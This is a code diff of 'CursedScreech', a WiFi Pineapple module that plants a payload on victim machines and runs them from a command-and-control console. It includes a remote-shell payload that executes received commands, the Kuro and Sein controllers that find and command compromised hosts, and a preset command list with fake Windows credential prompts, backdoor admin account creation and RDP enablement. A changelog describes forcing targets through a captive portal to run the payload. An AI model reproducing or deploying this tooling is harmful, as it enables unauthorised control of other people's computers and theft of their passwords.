self.msg = "[!] Unauthorized access attempt on target " + gethostbyname(gethostname()) + ":" + str(self.lport)
continue
while 1:
try:
cmd = client.recv(4096)
if not len(cmd):
connected = False
break
shellThread = threading.Thread(target=self.execShellCmd, args=(client,cmd))
self.threads.append(shellThread)
shellThread.start()
except:
connected = False
break
listener.close()
# ======================================
# EXECUTE A CMD IN SHELL
# ======================================
def execShellCmd(self, sock, cmd):
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout_value = proc.stdout.read() + proc.stderr.read()
sock.sendall(stdout_value)

6
CursedScreech/includes/api/python/template/payload.py Executable file
View File

@@ -0,0 +1,6 @@
from PineappleModules import CursedScreech
cs = CursedScreech("Network Client")
cs.startMulticaster("IPAddress", mcastport, hbinterval)
cs.setRemoteCertificateSerial("serial")
cs.startSecureServerThread("privateKey", "publicKey", "kuroKey")

1
CursedScreech/includes/changelog/Version 1.0 Executable file
View File

@@ -0,0 +1 @@
March 03, 2016 - Module released.

6
CursedScreech/includes/changelog/Version 1.1 Executable file
View File

@@ -0,0 +1,6 @@
July 30, 2016
<br /><br />
- Updated API to include a class which hooks into PortalAuth's Payloader injection set to force authorization. This ensures the target executes the payload in order to get access to the network.
<br /><br />
- Added a checkbox under settings to automatically include authorization code in the payload source.<br /><br />
- Added the ability to select the interface on which sein will listen. This fixes the bug where targets would not appear on the Pineapple network.

9
CursedScreech/includes/changelog/Version 1.2 Executable file
View File

@@ -0,0 +1,9 @@
September 17, 2016
<br /><br />
- Updated C# API to support receiving and storing of files on target machines<br />
- Updated UI<br />
- Added file upload option to import payloads<br />
- Added 'Send File' EZ Cmd to send payloads to target machines<br />
- Made the module less of a resource hog when Sein and Kuro aren't running<br />
- Fixed bug where certificate store would not properly identify a key as encrypted<br />
- Added feature so encrypted keys can not be selected for Kuro in the certificate store

0
CursedScreech/includes/forest/activity.log Executable file
View File

0
CursedScreech/includes/forest/cmd.log Executable file
View File

15
CursedScreech/includes/forest/ezcmds Executable file
View File

@@ -0,0 +1,15 @@
Send File:C:\Temp\
Get PS Version:powershell "$PSVersionTable"
Get SysInfo:powershell "gwmi Win32_QuickFixEngineering | Select Description, HotFixID, InstalledBy, InstalledOn; gwmi Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, BootDevice, BuildNumber, CSName, CSDVersion, NumberOfUsers, Version | FL"
Windows PSv3+ Phish:powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"
Windows PSv2- Phish:powershell "Get-Credential | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"
Windows Alert:powershell "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Message', 'Title')"
Logoff User:shutdown /l
Restart:powershell "Restart-Computer"
Shutdown:powershell "Stop-Computer"
Add User:net user <USER> <PASSWORD> /ADD
Change User Password:net user <USER> <PASSWORD>
Delete User:net user <USER> /DELETE
Enable RDP:powershell "$key='HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'; if (!(Test-Path $key)) { New-Item -Path $key -Force | Out-Null }; New-ItemProperty -Path $key -Name 'fDenyTSConnections' -PropertyType 'DWORD' -Value 0 -Force | Out-Null; netsh advfirewall firewall set rule group='remote desktop' new enable=yes"
Add User to Remote Desktop Users Group:net localgroup "Remote Desktop Users" /ADD "<user>"
Add User to Administrators Group:net localgroup "Administrators" /ADD "<user>"

162
CursedScreech/includes/forest/kuro.py Executable file
View File

@@ -0,0 +1,162 @@
# Kuro looms up ahead, won't allow us to pass.
# Let us not travel further, lest we unleash her wrath.
# Her screech can be heard from atop her perch,
# commanding those fallen under her curse.
import select
import sys
import threading
from target import Target
# Pull settings from file
settingsFile = "/pineapple/modules/CursedScreech/includes/forest/settings"
target_list = ""
activity_log = ""
cmd_list = ""
settings = {}
with open(settingsFile, "r") as sFile:
for line in sFile:
params = line.strip("\n").split("=")
if params[0] == "target_list":
target_list = params[1]
elif params[0] == "activity_log":
activity_log = params[1]
elif params[0] == "cmd_list":
cmd_list = params[1]
else:
pass
def logActivity(msg):
with open(activity_log, "a") as log:
log.write(msg + "\n")
def connectTarget(ip, port):
target = Target(ip, int(port))
target.secureConnect()
if target.isConnected():
return target
else:
return False
# A list for target objects and threads on which to receive data
targets = []
threads = []
killThreads = False
def recvOnTarget(t):
global killThreads
while True:
if killThreads == True:
break
try:
ready = select.select([t.socket], [], [], 5)
if ready[0]:
t.recv()
except:
break
# Function to disconnect all targets and quit
def cleanUp(targets):
# Close all sockets
print "[>] Cleaning up sockets"
logActivity("[>] Cleaning up sockets")
# Attempt to kill the thread
global killThreads
killThreads = True
for target in targets:
target.disconnect()
# Attempt to connect to all targets and store them in the targets list
with open(target_list, "r") as targetFile:
for t in targetFile:
# Strip newline characters from the line
t = t.strip("\n")
try:
ip = t.split(":")[0]
port = t.split(":")[1]
# Connect to the target and append the socket to our list
newTarget = connectTarget(ip, port)
if newTarget != False:
newThread = threading.Thread(target=recvOnTarget, args=(newTarget,))
threads.append(newThread)
newThread.start()
targets.append(newTarget)
except KeyboardInterrupt:
print "Interrupt detected. Moving to next target..."
continue;
quitFlag = False
if len(targets) > 0:
try:
logActivity("[!] Kuro is ready")
while True:
# Read from the target list to see if any new targets are
# available. If so, attempt to connect to them.
with open(target_list, "r") as targetFile:
for line in targetFile:
skip = False
line = line.strip("\n")
ip = line.split(":")[0]
port = line.split(":")[1]
# If the address is found in the target list, check if
# the port is the same
if any(t.addr == ip for t in targets):
for t in targets:
# If the ip address matches but the port does not
# disconnect the target and remove it from the list
if t.addr == ip and t.port != int(port):
t.disconnect()
targets.remove(t)
# Recreate the target object, connect to it, and
# add it back to the list
newTarget = connectTarget(ip, port)
if newTarget != False:
newThread = threading.Thread(target=recvOnTarget, args=(newTarget,))
threads.append(newThread)
newThread.start()
targets.append(newTarget)
else:
newTarget = connectTarget(ip, port)
if newTarget != False:
newThread = threading.Thread(target=recvOnTarget, args=(newTarget,))
threads.append(newThread)
newThread.start()
targets.append(newTarget)
# Read from cmd.log, send to targets listed, and clear
# the file for next use.
with open(cmd_list, "r") as cmdFile:
for line in cmdFile:
params = line.strip("\n").rsplit(":", 1)
cmd = params[0]
addr = params[1]
# Check if Kuro received a command to end her own process
if cmd == "killyour" and addr == "self":
quitFlag = True
else:
for t in targets:
if t.addr == addr and t.isConnected:
t.send(cmd)
# Clear the file
open(cmd_list, "w").close()
# Check if it's time to quit
if quitFlag:
break
except KeyboardInterrupt:
pass
cleanUp(targets)

122
CursedScreech/includes/forest/sein.py Executable file
View File

@@ -0,0 +1,122 @@
import socket
import struct
import sys
from target import Target
import threading
import time
# Load settings from file and assign to vars
settingsFile = "/pineapple/modules/CursedScreech/includes/forest/settings"
MCAST_GROUP = IFACE = target_list = activity_log = ""
MCAST_PORT = hbInterval = 0
settings = {}
with open(settingsFile, "r") as sFile:
for line in sFile:
params = line.strip("\n").split("=")
if params[0] == "target_list":
target_list = params[1]
elif params[0] == "activity_log":
activity_log = params[1]
elif params[0] == "mcast_group":
MCAST_GROUP = params[1]
elif params[0] == "mcast_port":
MCAST_PORT = int(params[1])
elif params[0] == "hb_interval":
hbInterval = int(params[1])
elif params[0] == "iface_ip":
IFACE = params[1]
else:
pass
# Default to a heartbeat of 5 seconds
# if one has not been set in file
if hbInterval == 0:
hbInterval = 5
# Function to determine if a target exists in the supplied list
def targetExists(tgt,l):
for t in l:
if tgt in t.addr:
return True
return False
def logActivity(msg):
with open(activity_log, "a") as log:
log.write(msg + "\n")
def writeTargets(targets):
with open(target_list, 'w') as tlog:
for target in targets:
tlog.write(target.sockName() + "\n")
# Set up the receiver socket to listen for multicast messages
sck = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sck.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sck.bind((MCAST_GROUP, MCAST_PORT))
sck.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MCAST_GROUP)+socket.inet_aton(IFACE))
# Import targets from file if any exist
targets = []
with open(target_list, 'r') as tList:
for line in tList:
targets.append(Target(line.split(":")[0], line.split(":")[1]))
def checkMissingTargets():
while True:
# Check if any targets are missing. If they are remove them
# from the target_list and writeTargets().
# 'Missing' is indicated by not receiving a heartbeat from a target
# within thrice the set heartbeat interval.
global targets
global hbInterval
updateTargetList = False
for t in targets:
if t.isMissing(hbInterval * 3):
targets.remove(t)
updateTargetList = True
if updateTargetList:
writeTargets(targets)
# Set up a separate thread to constantly check if targets
# have missed multiple heartbeats.
threads = []
newThread = threading.Thread(target=checkMissingTargets)
threads.append(newThread)
newThread.start()
while True:
print "Waiting for heartbeat..."
try:
msg = sck.recv(10240)
ip = msg.split(":")[0]
port = msg.split(":")[1]
print "Received: " + msg
# The heartbeat is sometimes used to send a message telling us
# when an invalid cert was sent to the target. This can be a sign
# of an attacker on the network attempting to access the shell
# we worked so hard to get on the target's system.
# We check for messages here and direct them to the proper log.
# For brevity's sake ip will let us know if it's a message and
# port will contain the contents of the message.
if ip == "msg":
logActivity("Multicast Message: " + port)
continue
# Check if the target currently exists in the target list
# if not then append it and write the list back out to
# target_list
if targetExists(ip, targets):
for i,t in enumerate(targets):
if ip == t.addr:
t.setPort(port)
t.lastSeen = time.time()
writeTargets(targets)
else:
targets.append(Target(ip, port))
writeTargets(targets)
except KeyboardInterrupt:
sys.exit()

13
CursedScreech/includes/forest/settings Executable file
View File

@@ -0,0 +1,13 @@
kuro_key=
target_key=
client_serial=File does not exist
iface_name=br-lan
iface_ip=172.16.42.1
mcast_group=231.253.78.29
mcast_port=19578
target_list=/pineapple/modules/CursedScreech/includes/forest/targets.log
activity_log=/pineapple/modules/CursedScreech/includes/forest/activity.log
cmd_list=/pineapple/modules/CursedScreech/includes/forest/cmd.log
hb_interval=5
kuro_serial=File does not exist
auth=1

126
CursedScreech/includes/forest/target.py Executable file
View File

@@ -0,0 +1,126 @@
from ssl import *
from socket import *
import time
import os
# Pull settings from file
settingsFile = "/pineapple/modules/CursedScreech/includes/forest/settings"
targetLogLocation = "/pineapple/modules/CursedScreech/includes/forest/targetlogs/"
activity_log = priv_key = pub_cer = client_key = client_serial = ""
settings = {}
with open(settingsFile, "r") as sFile:
for line in sFile:
params = line.strip("\n").split("=")
if params[0] == "activity_log":
activity_log = params[1]
elif params[0] == "kuro_key":
priv_key = params[1] + ".pem"
pub_cer = params[1] + ".cer"
elif params[0] == "target_key":
client_key = params[1] + ".cer"
elif params[0] == "client_serial":
client_serial = params[1]
else:
pass
def logActivity(msg):
with open(activity_log, "a") as log:
log.write(msg + "\n")
def logReceivedData(data, file):
with open(targetLogLocation + file, "a+") as tLog:
tLog.write(data + "\n")
class Target:
def __init__(self,addr=None,port=None):
self.addr = addr
self.port = int(port)
self.socket = None
self.msg = ""
self.recvData = ""
self.connected = False
self.lastSeen = time.time()
def secureConnect(self):
print "[>] Connecting to " + self.sockName()
logActivity("[>] Connecting to " + self.sockName())
try:
sck = socket(AF_INET, SOCK_STREAM)
self.socket = wrap_socket(sck, ssl_version=PROTOCOL_SSLv23, keyfile=priv_key, certfile=pub_cer, cert_reqs=CERT_REQUIRED, ca_certs=client_key)
self.socket.settimeout(10)
self.socket.connect((self.addr,self.port))
self.socket.settimeout(None)
# Fetch the target's certificate to verify their identity
cert = self.socket.getpeercert()
if not cert['serialNumber'] == client_serial:
logActivity("[-] Certificate serial number doesn't match.")
self.disconnect()
else:
print "[+] Connected to " + self.sockName() + " via " + self.socket.version()
logActivity("[+] Connected to " + self.sockName() + " via " + self.socket.version())
self.connected = True
except error as sockerror:
logActivity("[!] Failed to connect to " + self.sockName())
self.connected = False
def send(self, data):
if self.isConnected():
if "sendfile;" in data:
dataParts = data.split(";")
filePath = dataParts[1]
storeDir = dataParts[2]
self.socket.sendall("sendfile;" + os.path.basename(filePath) + ";" + str(os.path.getsize(filePath)) + ";" + storeDir)
with open(filePath, "rb") as f:
self.socket.sendall(f.read())
logActivity("[!] File sent to " + self.sockName())
else:
self.socket.sendall(data.encode())
logActivity("[!] Command sent to " + self.sockName())
logReceivedData(data, self.addr)
def recv(self):
try:
d = self.socket.recv(4096)
self.recvData = d.decode()
if not self.recvData:
self.disconnect()
return
logReceivedData(self.recvData, self.addr)
logActivity("[+] Data received from: " + self.sockName())
except KeyboardInterrupt:
return
except:
self.disconnect()
def isConnected(self):
return self.connected
def sockName(self):
return self.addr + ":" + str(self.port)
def disconnect(self):
logActivity("[!] Closing connection to " + self.sockName())
try:
self.socket.shutdown(SHUT_RDWR)
except:
pass
self.socket.close()
self.connected = False
def setPort(self, port):
self.port = int(port)
def isMissing(self, limit):
if time.time() - self.lastSeen > limit:
return True
else:
return False

0
CursedScreech/includes/forest/targets.log Executable file
View File

8
CursedScreech/includes/help/activitylog.help Executable file
View File

@@ -0,0 +1,8 @@
This log contains the output of Kuro. It will inform you when a connection is initiated, when
a connection has been established with a target, the set TLS level with the target, when a command
has been sent to a target, when data is received from a target, and when targets are disconnected.
<br /><br />
Sometimes, Sein will interject and add a message to the log. This only occurs when a target has
received a connection request from an attacker holding a key different from Kuro's. A message is
sent to the multicast group, Sein receives it, and posts it in the activity log. This informs you
that someone other than yourself is trying to access the shell on your target.

11
CursedScreech/includes/help/key.help Executable file
View File

@@ -0,0 +1,11 @@
<strong>Encrypted</strong><br />
Displays if the private key (.pem) is encrypted. Does not include encryption on .pfx containers.
<br /><br />
<strong>Select</strong><br />
When you click Select the associated key will be used. Both the private and public key will be used for Kuro.py and only the public key will be used for the target. This is so each program can verify the other when communicating over the network.
<br /><br />
<font color="red">
Do not select encrypted keys for Kuro. You will not be able to start the process if encrypted keys are used. You may select encrypted keys for the target if you are using C# to write your payload.
</font>

39
CursedScreech/includes/help/settings.help Executable file
View File

@@ -0,0 +1,39 @@
<h4>Listening Interface</h4>
This is the interface that will be used for the multicast socket. br-lan is the Pineapple
network and is what you will use if your targets are connecting to your Pineapple directly.
<br /><br />
<h4>Multicast Group</h4>
This is the address on which target heartbeats will be sent and received. The group needs to be
the same for both Sein and your targets in order for Sein to receive the messages.
<br /><br />
<h4>Multicast Port</h4>
This is the port on which Sein will receive messages from targets. This same port needs to be
reflected in the startMulticaster() method of your payload.
<br /><br />
<h4>Heartbeat Interval</h4>
The interval at which the payload will broadcast its listening address to Sein. Sein uses this
value, multiplied by 3, to determine if a target has dropped off the network (i.e. three heartbeats
have been missed, therefore, the target must be offline).
<br /><br />
<h4>Kuro Keys</h4>
The set of keys that Kuro will use for TLS communication. Your payload will verify Kuro's public
certificate if you use the API (which you should).
<br /><br />
<h4>Target Keys</h4>
The set of keys used by the payload for TLS communication. Kuro will verify the target's public
certificate upon connection.
<br /><br />
<h4>C# Payload</h4>
Downloads an archive containing the C# API, documentation, and a template C# payload configured
with the settings used here.
<br /><br />
<h4>Python Payload</h4>
Downloads an archive containing the Python API, documentation, and a template Python payload
configured with the settings used here.

14
CursedScreech/includes/help/status.help Executable file
View File

@@ -0,0 +1,14 @@
<h4>Sein</h4>
Sein is our information gatherer. It listens on the multicast group and port in Settings and
updates our target list when a compromised system is found.
<br /><br />
<h4>Kuro</h4>
Kuro is our attacker that sends out commands to the clients you select. At startup it attempts to
connect to all clients in the list. If Sein finds new targets while Kuro is running, connections to
them will be attempted automatically. Commands are sent asynchronously and returned data is received
in the same manner.
<br /><br />
<h4>Dependencies</h4>
The only dependency required is zip for downloading payloads and target logs.

30
CursedScreech/includes/help/targets.help Executable file
View File

@@ -0,0 +1,30 @@
<h4>EZ Cmds (select)</h4>
Pre-configured commands that can be sent to targets.
<br /><br />
<h4>EZ Cmds (button)</h4>
Open the EZ Cmds manager where you can add, edit, or delete EZ Cmds that appear in the list.
<br /><br />
<h4>Send command to target</h4>
Manually enter a command to send to targets.
<br /><br />
<h4>Target List</h4>
Displays the targets that are currently sending heartbeats to Sein. You can view, download,
and clear received data.
<br /><br />
<h4>Clear Targets</h4>
Clears the target list. If targets are still online and sending heartbeats to Sein they will
reappear in the list.
<br /><br />
<h4>All Logs</h4>
View, download, and delete logs from all clients, even those who were once connected but no longer
show up in the target list.
<br /><br />
<h4>Payloads</h4>
Manage payloads that can be sent to targets. Use the 'Configure Upload Limit' link if your payload fails to upload
due to size restrictions.

BIN
CursedScreech/includes/icons/glyphicons-17-bin.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.3 KiB

BIN
CursedScreech/includes/icons/glyphicons-198-remove-circle.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
CursedScreech/includes/icons/glyphicons-201-download.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
CursedScreech/includes/icons/glyphicons-202-upload.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
CursedScreech/includes/icons/glyphicons-28-search.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.4 KiB

BIN
CursedScreech/includes/icons/glyphicons-37-file.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
CursedScreech/includes/icons/glyphicons-433-plus.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.2 KiB

BIN
CursedScreech/includes/icons/glyphicons-447-floppy-save.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.3 KiB

20
CursedScreech/includes/scripts/bigToLittleEndian.sh Executable file
View File

@@ -0,0 +1,20 @@
#!/bin/sh
if [ $# -lt 1 ]; then
echo "Usage: $0 <serial>";
exit;
fi
orig=$1
serial=""
i=${#orig}
while [ $i -gt 0 ]
do
i=$(($i-2));
serial="$serial${orig:$i:2}-"
done
echo $serial"00"

41
CursedScreech/includes/scripts/cfgUploadLimit.py Executable file
View File

@@ -0,0 +1,41 @@
#!/usr/bin/python
from subprocess import call
php = "/etc/php.ini"
nginx = "/etc/nginx/nginx.conf"
lines = [f for f in open(php)]
with open(php, "w") as out:
for line in lines:
if "upload_max_filesize" in line:
parts = line.split("=")
parts[1] = " 20M\n"
line = "=".join(parts)
if "post_max_size" in line:
parts = line.split("=")
parts[1] = " 26M\n"
line = "=".join(parts)
out.write(line)
call(["/etc/init.d/php5-fpm", "reload"])
httpBlock = False
needsCfg = True
index = innerIndex = 0
lines = [f for f in open(nginx)]
for line in lines:
if "client_max_body_size" in line:
needsCfg = False
break
if needsCfg is True:
with open(nginx, "w") as out:
for line in lines:
if "http {" in line:
httpBlock = True
if httpBlock is True:
if innerIndex == 4:
lines.insert(index + 1, "\tclient_max_body_size 20M;\n")
innerIndex = innerIndex + 1
index = index + 1
out.write(line)
call(["/etc/init.d/nginx", "reload"])

9
CursedScreech/includes/scripts/checkDepends.sh Executable file
View File

@@ -0,0 +1,9 @@
#!/bin/sh
testZip=$(opkg list-installed | grep 'zip')
if [ -z "$testZip" ]; then
echo "Not Installed";
else
echo "Installed";
fi

14
CursedScreech/includes/scripts/getCertSerial.sh Executable file
View File

@@ -0,0 +1,14 @@
#!/bin/sh
if [[ $# -lt 1 ]]; then
echo "Usage: $0 <path to cert>";
exit;
fi
if ! [[ -e $1 ]]; then
echo "File does not exist"
exit;
fi
print=$(echo $(openssl x509 -noout -in $1 -serial) | sed 's/://g')
echo $print | tr "=" " " | awk '{print $2}'

8
CursedScreech/includes/scripts/getFingerprint.sh Executable file
View File

@@ -0,0 +1,8 @@
#!/bin/sh
if [ $# -lt 1 ]; then
echo "Usage: $0 <certificate>";
exit;
fi
openssl x509 -in $1 -noout -fingerprint | awk '{print $2}'

9
CursedScreech/includes/scripts/getInterfaceIP.sh Executable file
View File

@@ -0,0 +1,9 @@
#!/bin/bash
if [ $# -lt 1 ]; then
echo "Usage: $0 <iface>";
exit;
fi
ifconfig $1 | grep inet | awk '{split($2,a,":"); print a[2]}'

11
CursedScreech/includes/scripts/getListeningInterfaces.sh Executable file
View File

@@ -0,0 +1,11 @@
#!/bin/bash
IFCS=$(ifconfig | cut -d " " -f1 | awk 'NF==1{print $1}')
for iface in ${IFCS[@]}; do
if [[ $iface == "lo" ]]; then
continue
fi
if [[ $(ifconfig $iface | grep inet) != "" ]]; then
echo $iface
fi
done

8
CursedScreech/includes/scripts/installDepends.sh Executable file
View File

@@ -0,0 +1,8 @@
#!/bin/sh
# Author: sud0nick
# Date: Jan 2016
opkg update > /dev/null;
opkg install zip > /dev/null;
echo "Complete"

49
CursedScreech/includes/scripts/packPayload.sh Executable file
View File

@@ -0,0 +1,49 @@
#!/bin/sh
# Author: sud0nick
# Date: Jan 2016
help() {
echo "Usage: $0 <dir> <opts>";
echo '';
echo 'Parameters:';
echo '';
echo -e '\tdir:\tDirectory where the files reside';
echo -e '\t-f:\tFile names as string value';
echo -e '\t-o:\tName of output file';
echo '';
}
if [ "$#" -lt 1 ]; then
help;
exit;
fi
# Define and clear out the download directory
DL_DIR="/pineapple/modules/CursedScreech/includes/api/downloads/";
rm -rf $DL_DIR*
# Get the key directory and shift it out of the argument vectors
API_DIR="$1";
shift;
FILES='';
OUTPUT='';
export IFS=" ";
while [ "$#" -gt 0 ]
do
if [[ "$1" == "-f" ]]; then
for word in $2; do
FILES="$FILES $API_DIR$word";
done
fi
if [[ "$1" == "-o" ]]; then
OUTPUT="$2";
fi
shift
done;
zip -j $DL_DIR$OUTPUT $FILES > /dev/null;

6
CursedScreech/includes/scripts/removeDepends.sh Executable file
View File

@@ -0,0 +1,6 @@
#!/bin/sh
# Author: sud0nick
# Date: Jan 2016
opkg remove zip > /dev/null;

35
CursedScreech/includes/scripts/testEncrypt.sh Executable file
View File

@@ -0,0 +1,35 @@
#!/bin/sh
help() {
echo "Usage: ./testEncrypt.sh <opts>";
echo '';
echo 'Parameters:';
echo '';
echo -e '\t-d:\tDirectory where key resides';
echo -e '\t-k:\tName of key to test';
echo '';
}
if [ "$#" -lt 2 ]; then
help;
exit;
fi
KEY=''
KEYDIR=''
while [ "$#" -gt 0 ]
do
if [[ "$1" == "-k" ]]; then
KEY="$2.pem"
fi
if [[ "$1" == "-d" ]]; then
KEYDIR="$2"
fi
shift
done;
openssl rsa -in $KEYDIR$KEY -passin pass: | awk 'NR==0;'

734
CursedScreech/js/module.js Executable file
View File

@@ -0,0 +1,734 @@
registerController('CursedScreechController', ['$api', '$scope', '$sce', '$interval', '$http', function($api, $scope, $sce, $interval, $http) {
// Location of payload directory
$scope.payloadDir = "/pineapple/modules/CursedScreech/includes/payloads/";
// Throbbers
$scope.showSettingsThrobber = false;
$scope.showSeinThrobber = false;
$scope.showKuroThrobber = false;
$scope.uploadLimitThrobber = false;
// Depends vars
$scope.dependsProcessing = false;
$scope.dependsInstalled = false;
// Settings vars
$scope.settings_ifaceName = '';
$scope.available_interfaces = '';
$scope.settings_mcastGroup = '';
$scope.settings_mcastPort = '';
$scope.settings_hb_interval = '';
$scope.settings_kuroKey = '';
$scope.settings_targetKey = '';
$scope.settings_auth = false;
// Proc statuses
$scope.seinStatus = 'Not Running';
$scope.seinButton = 'Start';
$scope.kuroStatus = 'Not Running';
$scope.kuroButton = 'Start';
$scope.seinIsRunning = false;
$scope.kuroIsRunning = false;
// Log vars
$scope.currentLogTitle = '';
$scope.currentLogData = '';
$scope.activityLogData = '';
$scope.targets = [];
$scope.allTargetLogs = [];
// Key vars
$scope.certificates = '';
$scope.keyErrorMessage = '';
$scope.selectKuroKey = false;
$scope.selectTargetKey = false;
// Target Commands
$scope.targetCommand = "";
$scope.ezcmds = [];
$scope.selectedCmd = "";
$scope.newCmdName = "";
$scope.newCmdCommand = "";
$scope.checkAllTargets = false;
// Panes
$scope.showTargetPane = true;
$scope.showPayloadPane = false;
// Payload Vars
$scope.payloads = [];
$scope.selectedFiles = [];
$scope.uploading = false;
$scope.selectedPayload = "";
$scope.showPayloadSelect = false;
// Interval vars
$scope.stop;
/* ============================================= */
/* BEGIN DEPENDS FUNCTIONS */
/* ============================================= */
$scope.depends = (function(task){
if (task == "install" || task == "remove") {
$scope.dependsProcessing = true;
}
$api.request({
module: 'CursedScreech',
action: 'depends',
task: task
},function(response) {
if (task == "install") {
$scope.dependsProcessing = false;
if (response.success === false) {
alert("Failed to install dependencies. Make sure you are connected to the internet.");
} else {
$scope.depends("check");
}
} else if (task == "remove") {
$scope.dependsProcessing = false;
$scope.depends("check");
} else if (task == "check") {
$scope.dependsInstalled = (response.success === true) ? true : false;
}
});
});
/* ============================================= */
/* BEGIN SETTINGS FUNCTIONS */
/* ============================================= */
$scope.loadSettings = (function(){
$api.request({
module: 'CursedScreech',
action: 'loadSettings'
},function(response){
if (response.success === true) {
var configs = response.data;
$scope.settings_ifaceName = configs.iface_name;
$scope.settings_mcastGroup = configs.mcast_group;
$scope.settings_mcastPort = configs.mcast_port;
$scope.settings_hb_interval = configs.hb_interval;
$scope.settings_kuroKey = configs.kuro_key;
$scope.settings_targetKey = configs.target_key;
$scope.settings_auth = (configs.auth == 1) ? true : false;
}
});
});
$scope.updateSettings = (function(){
$scope.showSettingsThrobber = true;
// Add the settings variables to a dictionary
data = {
'iface_name': $scope.settings_ifaceName,
'mcast_group': $scope.settings_mcastGroup,
'mcast_port': $scope.settings_mcastPort,
'hb_interval': $scope.settings_hb_interval,
'kuro_key': $scope.settings_kuroKey,
'target_key': $scope.settings_targetKey,
'auth': $scope.settings_auth
};
// Make the request to update the settings
$api.request({
module: 'CursedScreech',
action: 'updateSettings',
settings: data
},function(response) {
if (response.success === true) {
$scope.loadSettings();
}
$scope.showSettingsThrobber = false;
});
});
$scope.useDefault = (function(setting){
if (setting == "mcast_group") {
$scope.settings_mcastGroup = '231.253.78.29';
} else if (setting == "mcast_port") {
$scope.settings_mcastPort = '19578';
} else if (setting == "hb_interval") {
$scope.settings_hb_interval = "5";
} else if (setting == "auth") {
$scope.settings_auth = false;
}
});
$scope.loadAvailableInterfaces = (function(){
$api.request({
module: 'CursedScreech',
action: 'loadAvailableInterfaces'
},function(response){
if (response.success === true) {
$scope.available_interfaces = response.data;
} else {
alert("An error has occurred. Check the logs for details");
}
});
});
/* ============================================= */
/* BEGIN PROCESS FUNCTIONS */
/* ============================================= */
$scope.startProc = (function(name){
if (name == "sein.py") {
$scope.showSeinThrobber = true;
} else if (name == "kuro.py") {
$scope.showKuroThrobber = true;
}
$api.request({
module: 'CursedScreech',
action: 'startProc',
procName: name
},function(response) {
if (name == "sein.py") {
if (response.success === true){
$scope.seinIsRunning = true;
$scope.seinStatus = "Running - PID: " + response.data;
$scope.seinButton = "Stop";
}
$scope.showSeinThrobber = false;
} else if (name == "kuro.py") {
if (response.success === true) {
$scope.kuroIsRunning = true;
$scope.kuroStatus = "Running - PID: " + response.data;
$scope.kuroButton = "Stop";
}
$scope.showKuroThrobber = false;
}
});
});
$scope.procStatus = (function(name){
$api.request({
module: 'CursedScreech',
action: 'procStatus',
procName: name
},function(response){
//console.log(response);
if (response.success == true) {
if (name == "sein.py") {
$scope.seinIsRunning = true;
$scope.seinStatus = "Running - PID: " + response.data;
$scope.seinButton = "Stop";
} else if (name == "kuro.py") {
$scope.kuroIsRunning = true;
$scope.kuroStatus = "Running - PID: " + response.data;
$scope.kuroButton = "Stop";
}
} else {
if (name == "sein.py") {
$scope.seinIsRunning = false;
$scope.seinStatus = "Not Running";
$scope.seinButton = "Start";
} else if (name == "kuro.py") {
$scope.kuroIsRunning = false;
$scope.kuroStatus = "Not Running";
$scope.kuroButton = "Start";
}
}
});
});
$scope.stopProc = (function(name){
$api.request({
module: 'CursedScreech',
action: 'stopProc',
procName: name
},function(response) {
if (response.success === true){
if (name == "sein.py") {
$scope.seinIsRunning = false;
$scope.seinStatus = "Not Running";
$scope.seinButton = "Start";
} else if (name == "kuro.py") {
$scope.kuroIsRunning = false;
$scope.kuroStatus = "Not Running";
$scope.kuroButton = "Start";
}
}
});
});
/* ============================================= */
/* BEGIN PAYLOAD FUNCTIONS */
/* ============================================= */
$scope.genPayload = (function(type){
// Check if CursedScreech authorization should be used
// if so change the type to 'cs_auth'
if (type == "cs" && $scope.settings_auth == true) {
type = "cs_auth";
}
$api.request({
module: 'CursedScreech',
action: 'genPayload',
type: type
},function(response) {
if (response.success === true) {
window.location = '/api/?download=' + response.data;
} else {
console.log("Failed to archive payload files");
}
});
});
$scope.clearDownloads = (function(){
$api.request({
module: 'CursedScreech',
action: 'clearDownloads'
},function(response){
if (response.success === false){
console.log("Failed to clear API downloads directory.");
}
});
});
/* ============================================= */
/* BEGIN TARGET FUNCTIONS */
/* ============================================= */
$scope.sendCommand = (function(){
if ($scope.targetCommand == "") {
return;
}
var checkedTargets = []
for (var x=0; x < $scope.targets.length; x++){
if ($scope.targets[x].checked) {
checkedTargets.push($scope.targets[x].socket.split(":")[0]);
}
}
if (checkedTargets.length == 0) {
return;
}
// Check if a payload is to be sent and build its command string
var cmd = "";
if ($scope.showPayloadSelect) {
// ex: "sendfile;/pineapple/modules/CursedScreech/includes/payloads/NetCli.exe;C:\Temp\"
cmd = "sendfile;" + $scope.payloadDir + $scope.selectedPayload.fileName + ";" + $scope.targetCommand;
} else {
cmd = $scope.targetCommand;
}
$api.request({
module: 'CursedScreech',
action: 'sendCommand',
command: cmd,
targets: checkedTargets
},function(response){});
});
function getTargetIndex(sock){
var addr = sock.split(":")[0];
for (var x=0; x < $scope.targets.length; x++){
if ($scope.targets[x].socket.split(":")[0] == addr){
return x;
}
}
}
function itemExistsInList(item,list){
